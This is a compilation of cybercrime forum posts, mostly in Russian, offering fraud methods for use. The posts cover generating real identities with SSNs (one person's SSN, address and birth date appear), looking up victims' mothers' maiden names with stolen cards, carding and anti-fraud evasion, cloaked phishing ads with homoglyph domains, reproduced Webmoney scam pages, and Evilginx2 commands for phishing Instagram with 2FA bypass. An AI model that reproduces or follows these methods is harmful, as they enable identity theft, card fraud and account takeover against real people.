(ALESIA SWANK APT AK-6 120 ELM ST EDGEWATER PARK NJ 8010 158-84-8869 3/1/1988)
База данных 2017-2018 год
Сгенерировать МРЗ код/Персональный номер для паспорта США и других документов.
Получить инструкцию по Баркодам и их содержимому в Водительских удостоверениях USA/
Отдельно можно получить бесплатно FULL INFO в телеграмм боте
https://web.telegram.org/#/im?p=@generatormrfullinfobot
https://generatormr.com/full-info#work-box
You can generate real Full Info (random) for free)
Example:
(ALESIA SWANK APT AK-6 120 ELM STREET EDGEWATER PARK NJ 8010 158-84-8869 3/1/1988)
Database 2017-2018 year
To generate SSE code/Personal number for the US passport and other documents.
Get instructions on Barcodes and their contents in the USA Driver's licenses/
You can also get FULL INFO for free in the telegram bot
https://web.telegram.org/#/im?p=@generatormrfullinfobot
Генерирует фулл и ссн! Реальные фулки, из базы какой-то дергает. чекал лично руками, все валидные, бывает из-за того что такая фулка уже есть и она в лимите! Если собираетесь использовать их, то пробивайте бг, чтобы получить более точную инфу!
Пробив MMN, MDOB
MMN - mother maiden name - девичья фамилия матери
MDOB - mother date of birth -датат рождения матери
В США есть интересный сервис-Ancestry.
Сервис позволяет производить поиск родственников/однофамильцев и составлять гинеологическое древо семей.
Кому как, а нам этот сервис пригодится для другого )
Естественно, сервис не бесплатен-стоит порядка 25 баксов/месяц,но....
К оплате принимаются СС,что очень упростит нам жизнь.
Кроме того, данный сервис предлагает опробовать свои услуги в 14-дневном пробном (бесплатном) режиме.
Единственным условием для этого является обязательная авторизация суммы, необходимой для последующей оплаты сервиса.
Именно авторизация, а не снятие
То есть, сумма будет списана только через 14 дней после регистрации, по окончанию пробного периода.
================================================================
Итак, с теорией разобрались.
Пора переходить непосредственно к практике.
Что нам для этого понадобится:
-ЮСА СС отработка
-Сокс или дед (желательно под штат, но это абсолютно не критично)
-Немного прямые руки и 10-15 минут времени
Дополню сервисами familytreenow.com и whitepages.com
Тоже многое можете найти по родственникам.
================================================================
Приступим.
В правой верхней части экрана жмем на кнопку "Start Free Trial".
- U.S. DELUXE MEMBERSHIP
- WORLD DELUXE MEMBERSHIP
Выбираем оптимальный вариант:
WORLD DELUXE MEMBERSHIP (3-Month $27,95/month after trial) и жмем "Continue"
Далее нас просят заполнить регистрационную форму-вбиваем Имя/Фамилию холдера, нашу почту и жмем "Continue"
Следущий шаг-продолжаем вбивать свои данные (то есть данные кардхолдера )
Вбиваем Billing-адрес и снова жмем "Continue"
Не забываем согласиться с Условиями Обслуживания и жмем "Start Free Trial"
Еще раз напомню, что сумма не снимается с карты, а только авторизуется
Здесь указаны наши регистрационные данные (Логин/пасс к акку, а также информация о оплате)
Естественно, в очередной раз жмем "Continue"
================================================================
Собственно, на этом сам процесс регистрации завершен.
Переходим к поиску интересующих нас данных, а точнее MMN и MDOB.
Заходим в расширенный поиск ("Show Advanced")
Вводим известные нам данные:
Так как нам известно имя/фамилия холдера, а узнать нам нужно данные его/ее матери, нас интересуют только поля:
- Family Member
(выбираем ""Child" и вводим имя/фамилию холдера)
- Gender
(выбираем "Female", т.к. нас интересует мать холдера)
- Collection Priority
(выбираем страну, можно оставить без изменений для поиска по всей базе)
Ну и соответственно жмем "Search"
Видим результаты поиска
Найдя нужного человека, нажимаем "See All information" или на истроку с наименованием и получаем искомый результат
Иногда поиски затягиваются или не приносят должного результата,
но при должном подходе все затраты времени и сил окупятся с лихвой.
Пробив холдера авто USA
Данные которые использовались в статье:
TIFFANI G MOENCH
DOB: 09/25/70
845 CHELSIE DRIVE, KAYSVILLE, UT 84037
Итак начнем!
Заходим на сайт: https://www.geico.com/
вводим ZIP и нажимаем GET A QUOTE:
Далее вводим имя фамилию адрес и доб и жмем NEXT:
И на следующей странице мы видим машины(отображаются не всегда) на данные
которые вбили:
Юзайте клоаку для адв.
Для удобства я возьму хостинг www.namecheap.com
дешево быстро и фришный ссл независимо от клауда, который при репорте убьет
ваш домен. Таблица с символами уже не доступна, но для вас я ее сохранил.
Для примера возьму домен www.winminer.com
Открывает таблицу и видим символ в Icelandic алфавите í
Spoiler: img
копируем и заменяем в нашем домене, получаем так: www.wí nminer.com
Spoiler: img
В процессе оформления на этой странице выбираем язык символа:
Spoiler: img
/SPOILER]
Таблица:
Таблица:
web.archive.org
You must have at least 77 reaction(s) to view the content.
ищу партнера.с аками даной плошадки
Подскажите актуальные шопы cc, и если есть инвайт буду благодарен. Можно в пм.
Всем привет!
Вы уже наверно слышали про сайт Honeygain.com
Spoiler: Что такое Honeygain.com
Вот гугловский перевод.
Что такое Honeygain?
Honeygain - это краудсорсинговая сетевая компания,
которая позволяет другим компаниям проводить аналитические, рыночные и бизнес-
исследования.
Что делает приложение Honeygain?
Это безопасно? Приложение предоставляет прокси-сервисы третьим лицам, таким
как специалисты по данным,
Fortune 500 и другие заслуживающие доверия компании. Это безопасно? Да! Ваша
безопасность важна для нас.
И поскольку пчелиная матка знает своих пчел, мы знаем, для чего каждый партнер
использует свою сеть.
Безопасны ли мои персональные данные с Honeygain?
100%. Мы не храним никаких данных наших клиентов. Единственные данные, которые
мы будем иметь, это то,
что будет необходимо для сервиса. Это включает в себя ваш адрес электронной
почты, ваш IP-адрес,
сколько трафика вы делаете в месяц и выбранные вами способы выплаты.
Как рассчитывается мой платеж?
Вы зарабатываете кредиты за каждый введенный вами килобайт данных, и,
собрав достаточное количество кредитов, вы можете конвертировать их в доллары
США.
How credits convert to USD?
10 credits are equal to 0.01USD (1 cent USD)
Каковы ваши лучшие места?
У нас нет лучших мест - у Honeygain есть покрытие по всему миру.
Есть ли приложение для Windows?
Да! Мы запустили приложение для Windows! Теперь вы можете Honeygain
на вашем рабочем столе! Получи это здесь
Работает ли Honeygain на Wi-Fi и мобильных данных?
Да, Honeygain работает как на Wi-Fi, так и на мобильных данных.
Мобильные данные должны быть включены в настройках приложения.
Какова минимальная выплата?
Минимальная выплата составляет 20 долларов США.
Какова текущая ставка выплат?
Вы получаете 1 кредит за 10 МБ трафика, проходящего через вас. Таким образом,
за 10 ГБ вы заработаете 1 доллар США.
Какие способы выплат доступны в настоящее время?
В настоящее время мы поддерживаем платежи через PayPal, но скоро появятся
новые возможности!
Есть ли способ увеличить мой заработок?
Все просто - установите Honeygain на большее количество устройств и подключите
устройство к сети (работа, дядя или ваш дом).
Это поможет вам максимально увеличить ваши потенциальные выплаты. (Лучше
всего, когда уникальный IP-адрес имеет не более 3 устройств)
На каких сетях работает Honeygain? Что означает ошибка «Сеть недоступна»?
Honeygain поддерживает только ваши домашние и мобильные сети (IP-адреса). Если
вы подключены к сети другого типа (IP-адрес),
вы увидите следующую ошибку «Сеть неработоспособна», и приложение будет
остановлено, пока вы не подключитесь к соответствующей сети.
На скольких устройствах я могу использовать Honeygain? Что означает ошибка
«Перегрузка сети»?
Вы можете использовать до 3-х устройств в одной сети (IP-адрес) одновременно,
но чтобы получить максимальный доход,
у вас должно быть 1 устройство на IP-адрес. Дополнительные устройства,
подключенные к этой сети,
будут приостановлены и будут отображать ошибку «Network Overused» до тех пор,
пока не уменьшится количество активных устройств.
В целом, мы не ограничиваем количество устройств, подключенных к вашей учетной
записи - если вы хотите использовать 100 устройств,
вы можете, но вы должны подключить их как минимум к 20 различным сетям (по 3
устройства в каждой).
Сколько данных использует Honeygain?
Вы можете рассчитывать на использование до 2 ГБ в день, хотя учтите, что в
зависимости от скорости вашей сети мы можем достичь максимум 15 ГБ в день.
Могу ли я защитить себя от использования всего моего тарифного плана?
Да. Вы можете сделать это, просто отключив использование мобильных данных в
меню настроек приложения Honeygain.
Или, если в Windows - щелкните правой кнопкой мыши значок Honeygain bee и
выберите «выйти», чтобы выключить приложение.
Могу ли я установить предупреждение о том, сколько данных я использую?
Если вы используете версию нашего приложения для Android, мы рекомендуем
использовать уведомления об использовании данных Android.
Что касается пользователей Windows, в настоящее время мы работаем над
решением.
Могут ли мои кредиты истечь?
Обычно нет. Если вы активный пользователь, срок действия ваших кредитов не
истечет.
Однако срок действия кредитов Honeygain истекает через 6 месяцев после того
дня, когда вы были активны в последний раз.
Как я могу связаться с вами?
Не стесняйтесь обращаться к нам через контактную форму нашего сайта!
У вас есть реферальная программа?
Да! Вы можете пригласить своих друзей с помощью персонализированной ссылки, и
10% их ежедневного заработка будет добавлено на ваш счет!
Как долго мне нужно ждать выплаты?
Продолжительность выплаты зависит от выбранного вами типа оплаты и вашего
местоположения.
Для платежей PayPal они должны быть обработаны в течение 24 часов.
Могу ли я использовать Honeygain, если я несовершеннолетний?
Законный возраст зрелости зависит от страны, в которой вы живете, поэтому мы
советуем вам убедиться, что это такое.
Если вы несовершеннолетний, вам может потребоваться разрешение ваших родителей
или опекунов на использование Honeygain.
Как узнать, что приложение работает?
Если вы используете Android, вы увидите небольшое зеленое уведомление на
панели уведомлений.
В Windows просто наведите курсор мыши на маленький значок пчелы на панели
уведомлений.
Будет ли работать Honeygain, если я использую VPN?
Нет, мы не поддерживаем IP-адреса сетей VPN или Datacenter.
Что произойдет, если я выключу свой Wi-Fi или Wi-Fi будет недоступен?
Приложение автоматически остановится и будет ждать, пока оно не сможет снова
подключиться к сети.
Будет ли использование сети Honeygain мешать моему повседневному использованию
данных?
Вы не должны чувствовать никакой разницы с нашим приложением, работающим в
фоновом режиме.
Мы настроили наше приложение так, чтобы оно никогда не использовало более 10%
доступной пропускной способности сети.
Использует ли приложение больше батареи?
Да, пока активно разделение трафика, приложение использует батарею устройства.
В зависимости от возраста вашего устройства ожидаемое потребление может
варьироваться от 5% до 8% батареи в день.
Honeygain ставим на дедик и получаем $. Сайт использует твой интернет как
прокси. За это платит в $ на ПайПал. По реферальной ссылке дают 5$ на счёт,
без реферальной будешь зарабатывать с нуля, как я. Я нашёл прогу на серваке,
ну и зарегался. другу кинул свою реферальную ему дали 5$.
Реферальная: тык
Не реферальная: тык
Начнем зарабатывать немного кэша,а не 10 центов в день как у других получается
1. Регистрируемся на сайте
Реферальная: тык - 5 $ получите сразу
на свой счет в личном кабинете,для вывода останется накопить 15 $
Не реферальная: тык
2.Скачиваете официальный софт с сайта Honeygain скачать
3.Скачиваем бот+ исходники в архиве [CLIKE]
You must have at least 2 reaction(s) to view the content.
[/CLIKE]
4.После того как все скачали,устанавливаем софт из пункт 2
Путь установки не меняем,обычно путь такой C:\Users\Имя вашего
пользователя\AppData\Roaming\Honeygain\
если программа при запуске пишет
типо не поддерживаемая сеть или
если программа работает то оставляем работать,если нет то читаем далее,на
многих дедиках у меня эта
софтина не хотела работать,продолжим
5.Выходим из Honeygain приложения, и запускаем бот из Honeygain Bot Free.exe
из папки Honeygain Bot Free
либо компилируете сами,исходники также прикладываю в архиве
бот выглядит так
6.Переходим в личный кабинет https://dashboard.honeygain.com/
кликаете правой кнопкой мыши в любом месте и нажимаете "Просмотреть код" или
Ctrl+Shift+I
7.Нажимаем вкладку Network (1)
(2)balance
(3) Headers
и листаем вниз до надписи authorization:
выделяем все после двоеточия
authorization:
все что ниже выделяете у себя
пример:
8.Копируем все выше выделенное(это ваш токен авторизации) и вставляем сюда
Line token оставить пустым
**Tread **больше 2 не ставить(количество одновременно запущенных копий
программ) на официальном сайте написано
что больше 3 устройств на одном ip адресе снижают скорость и заработок тоже
соответственно
Delay оставьте по умолчанию 300
Autorun(автозапуск бота) можете включить по желанию
Limit (количество переданных гигабайт) ставьте любым,естественно чем
больше тем лучше
ну и после очень ~~сложных~~ простых настроек нажимаем
курим 5 секунд,и можете запускать нажатием кнопки Start нашу уже пропатченную
софтину ,она запустится автоматически,в трее появится иконка пчелки
мой пример как выглядит так, у вас здесь будет по 0 ,вы же только начали
работать
далее окно для ввода вашей почты и пароля который вы указывали при регистрации
их вводить сюда
нажимаем логин,софт работает,минуты через 2 проверяем количество баллов и количество переданых мегабайт,если пусто, ждем,не факт что ip вашей страны будет востребован сразу,но он будет поверьте!
В дальнейшем можно запускать софт и без бота,программа уже пропатченна,у
программы находящиеся в папке \AppData\Roaming\Honeygain\ снизится вес,это
нормально не пугайтесь.
Можно сделать портабл версию,копируете папку Honeygain отсюда
\AppData\Roaming\Honeygain\ и можете запускать на других ПК,файл
HoneygainUpdater лучше удалить,ибо программа будет постоянно проверять
обновления и если обновится,то весь патчинг слетит и придется делать все
заново!
P.S
Из моих личных наблюдений скажу сразу,страны азиатского контингента менее
востребованы чем Европа или USA,
лично на одном из дедиков с немецким ip, у меня за один день прошло трафика 15
гигов,хороший спрос естественно на такие страны как
Америка,Канада,Великобритания,Германия,Франция,Италия,Испания,но это не значит
что не надо пробовать другие страны,что касается нашей необъятной страны
России,то в день максимум был спрос 3-5 гигов,иногда и вообще 200-300 Mb .
Заметил странное снижение трафика перед набором минималки в 20 баксов,но после
выплаты все снова стало зае..сь!
Выплата приходит в течении 1-2 дней,бывало и через 5 часов
Минималку на выплату я набирал по разному ,бывало и за 3-4 дня , бывало и 1-2
недели
Количество постоянно работающих дедиков в 15-30 штук приносят примерно около
3-4 баксов в день,еще раз повторюсь зависит все от ip страны дедика и от
количества пропускной способности(желательно 1ГБ но и со 100 Mb тоже пойдет)
На своем домашнем ПК или телефоне с андроидом(для ios приложения нет) можете смело ставить программу,по вирустоталу файл чистый,ip за все время моего использования в черные базы не попал,все таки они дорожат своей репутацией ибо потеряют клиентов!
Немножко пруфов
Надеюсь объяснил подробно,все удачного заработка!И не верьте в бред которые
пишут люди про заработок 4 цента в сутки!
Всем здоровья и удачи!
So I’m a professional Spammer and have a lot of experience in BEC . Im creating this thread to talk about anything related to bec . Anyone feel free to ask any question I will answer being the most blunt possible.
слитый курс от wwh
You must have at least 5 message(s) to view the content.
MY ENGLISH IS PURE CHAOS SO FORGIVE ME THAT,WARNING AFTER READING YOU CAN BE
MORE CONFUSED NOT FROM INFORMATIONS BUT FROM MY CUSTOM ENGLISH,
MADE BY BACKSTAB,EVERYTHING IS WRITTEN BY MYSELF,NOTHING ON THIS POST i NOT
COPY/PASTE FROM ANOTHER SOURCE,ENJOY
because people share knowledge and users help each other so I want too bring
something useful to community and its be just my experience and knowledge
please don't expect any methods I just want update some information what you
could find in guides
also I am not expert there I just want help and share my experience
i know we cannot share together working methods because its be fast burned but
i think people must have valid information from which can learn so lets go
start
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Carding is not same like vendors,scammers present to You
a lot information what you could find on clear net or even on other forums is
outdated
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1. EASY/SIMPLE BASIC INFORMATION
Few example what I found on outdated or even forums,guides
-use Firefox and extension ( for example to load PayPal account with
cookies )
that's was probably work few years ago but now its anti-fraud system more
better and extension could be detected
anyways Mozilla Firefox have high Spyware level so I think its not safe like
people say
-use Virtual Machine
again that's was probably work few years ago but now its can be again detected
( check attach file to proof my information )
**also its you can setup VM to not be detected but that 's nobody cannot know
when people don't tell you that **
_also maybe a lot people don 't know how dangerous is Mozilla Firefox ( check
attach file to proof my information )
you can easily solved use arkenfox **(https://github.com/arkenfox/user.js )
**_
I can continue more because there is many things but I don 't want waste
your time and I just want proof my information
**don 't forget check attachment **
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
I remember times when people on Carding groups on Telegram don't care about
security and OpSec everyone want just fast money but nobody want learn
so let me tell you few basic problem with carding and payments what people
have
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 - CARD IS DEAD
2 - BAD PROXY
3 - BAD SETTING/SETUP
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
_1 - CAN BE EASILY SOLVED OVER VERIFIED CHECKER FOR CARDS
2 - ITS MORE COMPLICATED FOR THIS REASON CHECK _( check attach file to
proof my information )
a) You must always check anti-fraud score under 0-20 is okay that was you see
on screenshot its bad and never works for payment
b) DNS LEAK MUST MATCH WITH ISP
EXAMPLE : COMCAST CABLE ( SOCKS5 ) MUST HAVE COMCAST CABLE ( DNS ) THAT'S
CORRECT
COMCAST CABLE ( SOCKS5 ) HAVE GOOGLE OR ANOTHER DNS IS WRONG AND AGAIN NEVER
WORK PROPERLY FOR PAYMENTS
3 - ITS MOST COMPLICATED AND ITS BE VERY HARD FOR ME DESCRIBE AND EXPLAIN WHAT I CURRENT MEAN
Now i don't want immediately jump how properly setup your device but I want write my theory with some examples ( some information can be repeated )
- like i said its most complicated thing and for me its hard describe in
this post but let me start from begin
when i was start with carding i was read guides where vendors write "use
Firefox and use extension" now we know its bad because its can be detected
**for example do you know what is device fingerprints or even browser
fingerprints/canvas fingerprints
do you know webGL could detect your GPU ? **
_do you know TCP/IP could detect your real OS ? ( so when spoofing from
Linux to Windows over some anti-detect browser TCP/IP could be problem )
i am pretty sure some things you don't know before that you read this and
don't worry its not reason to be shamed,
this problematic about browser I be explain more and when you have over 20
reactions on your account you can check it _
- many people tell you use RDP and there can be again some problem because
many vendors sell VM RDP and that 's real problem
be honest i know how its be flustered why payments not work and you just read
again outdated guides and think what you was doing wrong
now be honest and buy physical RDP can be for many us problem and expensive as
hell,so for this reason I was start from begin and that was download Linux and
try hack owns RDP
because my theory is carders want fast and easy money but they don't start
from begin but somewhere from middle
simple who hack RDP ( hackers ) vendors just sell they
_who phish cards ( phishers ) and again vendors many times don 't have any
idea how use they just sell _
so I think its perfect and fine to download some Linux and start from begin and try hack own RDP or even get some experience about phishing
now another example many scammers sell method+bin but let me tell you
secret and that's every site is cardable You need always just non-vbv bin
but also I want say its can be true and some sites is more hard to card than
others
now my personal experience when I was bought gift cards
on sites egifter,dundle I maked purchase 50$ Steam gift card and after I try
bought another they want DL FRONT+BACK ( maybe selfie ) what must match with
victim on card and for that i was not ready
so that's another problem You was come to do carding and you never think about
( like make digital DL over photoshop and PSD templates )
and be honest that's fucking hell because every state in USA have different
PSD template and different PDF417 barcode
Yes i know its better ways how cash out card but everyone tell you buy gift
cards or even crypto ( its same difficult )
simple to say I recommend to use android phone rooted,custom rom and etc
**- FLASH TWRP
- CUSTOM ROM WITHOUT GAPPS
- FLASH MAGISK
- MOST IMPORTANT IS USE XPOSED MODULES
2. EXAMPLE OF CARDING/ BASIC INFORMATION **
You must have at least 10 reaction(s) to view the content.
https://www.getcopper.com/ - карта как greenlight, для тинейджеров, можно линкануть и ба и карту, депать с них деньги. Можно так же создать ребенка и слать ему.
https://sentpaid.com/ - paypal инвойсы, неординарный подход ?
https://www.northone.com/ - бизнес банк, что с ним делать, поймут только те, кто работает с регистрацией ллсишек и так далее.
Как и обещал.
Привет славпох с 2016
Подготовка арсенала.
Первое что вам нужно, это клоака. Это некий фильтр от ботов и модераторов. Как это работает: Если модератор зашел на ваш ленд который вы клоачите, то ему покажет white.html и тем самым он не попадет на ваш фейк и даст апрув по линку. Так же есть гео фильтр, тут думаю все понятно.
Очень важный момент, что бы апрув РК прошел по маслу, пишите прокладку aka
white.html с нуля! Это может быть поставка паленых колонок jbl партиями через
тайланд в школу на день учителя.
Если вашу РК отклонили или акк ушел в бан, берите новый домен и пишите новую
прокладку!
Нам понадобится 2 домена:
1-й домен для прокладки aka white.html
2-й домен для вашего фейк\ленда ( в моем случаи в пример взят https: // login
. blockchain . com /#/login )
white page / вп / белая страница / прокладка - это страница которая
будет показываться модераторам или ботам.
offer page / блек пейдж - это страница, на которую будет кидать юзеров.
Я рекомендую взять >ТУТ< тестовый период на 7 дней для начала. Для примера возьму линк https: // login . blockchain . com /#/login
Spoiler: Настройка с иллюстрациями
Все, ваша клоака настроена и готова к бою! Начнем все загружать.
Загружаем.
1. Берем первый домен и хост офк который мы и будет сувать в рекламный кабинет,он же и есть клоака.
Spoiler: Файлы white.html + клоака. Клоака index.php
Грузим это все на ваш первый домен и все готово, желаю удачи в начинаниях.
p.s к сожалению не смогу часто отвечать на ваши вопросы в связи с личными проблемами.
Usus est optimus magister (лат. Опыт - лучший учитель)
В этой теме делимся негативным опытом обитания в сети. негативный опыт тоже
опыт и каждого из нас хоть раз да обманывали и пытались вытрясти деньги.
Вообщем все когда то были ламаками и верили что "наш ICQ цветок станет синим".
Я тоже отосплюсь и расскажу набор своих историй из личного опыта.
Думаю тема будет полезна тем, кто до сих пор попадается на все это дело.
Вообщем поехали.
Не давно в сети появился новый способ развода - по внутренней почте wm
keeper'a.
По внутреней почте приходит сообщение такого рода:
Code:Copy to clipboard
Поздравляем, вы выиграли в акции "Двойной баланс"!
С 2006г. по 2007г. каждый месяц Webmoney Transfer проводит различные акции. По ст.5.1 п.10 о соглашении Webmoney Transfer, компьютер случайным образом выбирает один WMID, который и станет победителем в той или иной акции.
В данном случае компьютер выбрал ваш WMID и вы стали призером акции "Двойной баланс".
Вы можете удвоить свои титульные знаки на любом из WMZ, WMR или WME
кошельке.
Для этого вам нужно:
Выбрать (см. внизу) один из вариантов, который вам больше подходит
В открывшемся окне ввести сумму, которую вы хотите удвоить (сумма должна быть не более, чем сумма на выбранном вами кошельке с учетом комиссии 0.8%)
Нажать продолжить
Выберите, какие титульные знаки хотите удвоить:
1. Умножить WMZ в 2 раза
2. Умножить WMR в 2 раза
3. Умножить WMU в 2 раза
4. Умножить WME в 2 раза
Примечание:
* баланс удваивается моментально.
* Удвоить можно только 1 раз.
HTML код данной страницы выглядит так:
Code:Copy to clipboard
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<style>
A {
COLOR: #1f4790; FONT-FAMILY: verdana, helvetica, sans-serif; TEXT-DECORATION: none
}
A:hover {
COLOR: #1f4790; FONT-FAMILY: verdana, helvetica, sans-serif; TEXT-DECORATION: underline
}
</style>
</head>
<body bgColor="#ffffff" leftMargin="3" topMargin="0" marginheight="0" marginwidth="0">
<table cellSpacing="0" cellPadding="0">
<tr>
<td>
<A href="http://www.webmoney.ru/" target="_blank"><IMG height="80" hspace="10" src="http://www.webmoney.ru/img/logo_wm.gif" width="170" border="0"></A>
</td>
</tr>
<tr>
<td align="center">
<font style="font-family: verdana, arial, helvetica, sans serif; color:#1f4790; font-size:13px;"><b>Поздравляем, вы выиграли в акции "Двойной баланс"!</b></font>
</td>
</tr>
<tr>
<td align="justify"><font style="font-family: verdana, arial, helvetica, sans serif; color:#444444; font-size:12px;">
С 2006г. по 2007г. каждый месяц Webmoney Transfer проводит различные акции.
По ст.5.1 п.10 о соглашении Webmoney Transfer, компьютер случайным образом выбирает один WMID, который и станет победителем в той или иной акции.
В данном случае компьютер выбрал ваш WMID и вы стали призером акции "Двойной баланс".
Вы можете удвоить свои титульные знаки на любом из WMZ, WMR или WME кошельке.
Для этого вам нужно:
<li>Выбрать (см. внизу) один из вариантов, который вам больше подходит
<li>В открывшемся окне ввести сумму, которую вы хотите удвоить (сумма должна быть не более, чем сумма на выбранном вами кошельке с учетом комиссии 0.8%)
<li>Нажать продолжить
</font>
</td>
</tr>
<tr>
<td><font style="font-family: verdana, arial, helvetica, sans serif; color:#444444; font-size:12px;">
Выберите, какие титульные знаки хотите удвоить:
1. <a href="wmkayto?Purse=Z653442206739&Desc=Умножение WMZx2&BringToFront=Y">Умножить WMZ в 2 раза</a>
2. <a href="wmkayto?Purse=R425160807968&Desc=Умножение WMRx2&BringToFront=Y">Умножить WMR в 2 раза</a>
3. <a href="wmkayto?Purse=U365215950008&Desc=Умножение WMUx2&BringToFront=Y">Умножить WMU в 2 раза</a>
4. <a href="wmkayto?Purse=E473564454543&Desc=Умножение WMEx2&BringToFront=Y">Умножить WME в 2 раза</a>
</font>
</td>
</tr>
<tr>
<td><font style="font-family: verdana, arial, helvetica, sans serif; color:#444444; font-size:10px;">
Примечание:
* баланс удваивается моментально.
* Удвоить можно только 1 раз.
</font>
</td>
</tr>
</table>
</body>
</html>
Спам идёт с разных WMID поэтому засечь конкретный WMID мошеника нельзя
Подробнее в
Арбитраже...
фейки:*
Spoiler: 15
_http://rapidshare.de/files/12415158/scams_loc.rar.html
Spoiler: 20
пасс: locator
---
*-Fake(фейк) в переводе с английского-подделка,обман.
---
ТОлько для ознакомления.
You must have at least 250 reaction(s) to view the content.
Вопросы задавать сюда
На самом WWH:
Полная стоимость 60.000 рублей.
Обязательно иметь на материал 200 USD.(12.000)
Click to expand...
Click to expand...
Тема будет дополняться в период до конца обучения
Запрещено сливать хайд на форумыClick to expand...
В архиве 2 папки - eth and btc. Используйте что хотите.
You must have at least 30 message(s) to view the content.
Evilginx2 - тула для фишинга от kgretzky. Киллер фича - это возможность забайпасить 2-fa. Для пользователя страница выглядит абсолютно идентично оригинальной, так как по факту это оригинальная страница и есть. Весь код страницы проксируется через nginx, а прокси подменяет все урлы которые есть в теле ответа, на урлы контролируемого домена, за счет чего все кнопки работают корректно, но редиректят на наш сервер.
Первая версия Evilginx была тоже хороша https://github.com/kgretzky/evilginx, но недостатками была сложность установки и конфигурирования, в результате сейчас проект не поддерживается, и многие конфиги не работают, хотя только на первой версии проекта у меня получалось допилить applied конфиг до рабочей версии, могу выпустить отдельный пост про это.
Прелесть второй версии в том, что все работает в докере, что убирает весь геморрой с конфигурированием, и оставляет нам править простецкий yml файлик
Список поддержвиаемых сервисов для фишинга, из коробки, впечатляет:
И так в посте покажу процес установки и разворачивания:
Установка:
Code:Copy to clipboard
curl https://get.docker.com/ | bash
git clone https://github.com/kgretzky/evilginx2
cd evilginx2
docker build . -t evilginx2
docker run -it -p 53:53/udp -p 80:80 -p 443:443 evilginx2
Интерактивный шелл который открылся умеет help. С этого момента можно выбрать любой из сервисов, я покажу на примере instagram:
Code:Copy to clipboard
config domain example.org # подставить свое
config ip 10.0.0.23 # подставить свое
phishlets hostname instagram insta2.exmaple.org # подставить свое
phishlets enable instagram
lures create instagram
lures get-url 0
https://www.insta2.example.org/oEnQzLHb
По ссылке для фишинга(https://www.insta2.example.org/oEnQzLHb) полная копия оригинального instagram с возможностью авторизации 2fa.
Каждый ввод ввод данных генерит сессию, с любой из сессий можно забрать куки, и воспользоваться ими для входа в сервис.
-----Original Message-----
From: WM Admin wmz-admin@list.ru
To: olka111@mail.ru
Date: Wed, 18 Oct 2006 20:05:42 +0400
Subject: Здравствуйте уважаемые пользователи Интернета!Здравствуйте уважаемые пользователи Интернета!
webmoneygenerators.by.ru -на этом сайте вы можете купить последнюю версию генератора электронных денег в платежной системе WebMoney.ru , также на сайте есть реквизиты для связи с нами!
Вам предлагаются программы для получения прибыли из международной платёжной системы WebMoney Transfer, которые способны обмануть, всем известный, WM Keeper. Если вы сейчас откажитесь, больше такой возможности не будет!
Приобретая программу, Вы получаете:
1. Надёжный и стабильный источник дохода.
2. Уверенность в себе и своём завтрашнем дне.
3. Вы навсегда сможете оставить работу в офисе или на предприятии и станете зарабатывать у себя дома, сидя за компьютером.
4. Вам придётся работать всего 5-30 минут в сутки (в зависимости от вашей собственной заинтересованности).
5. Вы будете в состоянии удовлетворить любую свою потребность, т.к. не будете испытывать стеснения в финансах.
6. Ваше пребывание в сети будет приносить вам немалые деньги.
Итак, что же это за программы:
WebMoneyGenerator 7.6
Новая суперэффективная программа для достижения на 100% гарантированных успехов в электронном заработке, даже если у Вас нет ни опыта, ни сайта, ни продукта для продаж... Последнее слово в технологиях получения денег при помощи сети Интернет! Вам не потребуется никаких дополнительных вложений, достаточно просто приобрести программу и Вы СРАЗУ ЖЕ сможете приступить к получению денег из Сети. НЕ ВКЛАДЫВАЯ ДОПОЛНИТЕЛЬНО НИ КОПЕЙКИ!!! На сегодняшний день одна из совсем немногих программ (единственная среди работающих), я бы сказал уникальная в своём роде, реально работающая и приносящая большую и регулярную прибыль своему владельцу, способная используя небольшие недоработки в клиентской части ПО международной платёжной системы WebMoney Transfer.
Принцип действия программы уникально прост. Дело в том, что для увеличения денежных средств на вашем WM кошельке вам не нужно больше воровать деньги у другого пользователя, пытаться украсть ключ идентификатор, или пароль к системе, достаточно воспользоваться программой Web Money Generator и просто увеличивать ежедневно ваш капитал на любую сумму. Данная программа создаёт виртуального (т.е. не существующего) отправителя, который отсылает вам эти деньги с автоматически сгенерированного Web Money Generator кошелька. Первые версии программы позволяли зарабатывать, таким образом, не более 10 WMZ в день, но, начиная с версии 2.0 улучшена система генерации, которая, теперь, позволяет использовать вашу программу неоднократно в день и получать до 1000 WMZ в сутки (больше просто не советую, т.к. такое обилие идентичных транзакций в сутки может вызвать подозрение у администрации сайта WebMoney и ваш счёт может быть заблокирован).Сайт программы webmoneygenerator.by.ru
Интерфейс данной программы очень понятен, и всё, что от Вас требуется, это запустить программу параллельно с WMKeeper и указать в ней сумму, тип и номер Вашего кошелька соответствующий данной валюте в системе WebMoney, на который и будут перечисляться деньги, другие необходимые данные программа считывает из памяти WMKeeper.
Стоимость этой программы составляет 50 WMZ. Я не могу продавать программу дешевле, в противном случае ей начнут пользоваться слишком много людей, а это чревато снижением её производительности и необоснованным риском. Это последняя версия генератора вышла 19 сентября. Продаваться будет до конца октября 2006 года, после продаж не будет! Скоро цена подымится до 100 WMZ.
WebMoney CARD
Существует множество способов пополнить свой кошелёк: банковский перевод, наличными в обменном пункте, и пр.
Сейчас нас интересует пополнение кошельков с помощью WM-карт. Активируете ее, и Ваш кошелёк уже пополнен. Смысл работы предлагаемой программы заключается в том, что номинал WM-карты несложным алгоритмом зашифрован в номере карты и в коде активации, после ввода этих значений в соответствующие поля программы, простым пересчётом она генерирует номер и код карты большего номинала. Из 10 - 20, из 20 - 50, из 50 - 100. Но не забывайте об осторожности, дело это не совсем законное, если не сказать, совсем.
Стоимость программы 30 WMZ. Сами понимаете, программа стоит того, окупится сразу.
Webmoney Keeper MOD
Предназначена для похищения денег с чужих кошельков. Представляет собой пакет, состоящий из двух изменённых файлов: Webmoney.exe и WMclient.dll. Работает с WMKeeper 2.2.0.6 - 2.4.0.0. Вам просто следует заменить существующие у Вас на компьютере файлы на новые, модификация заработает.
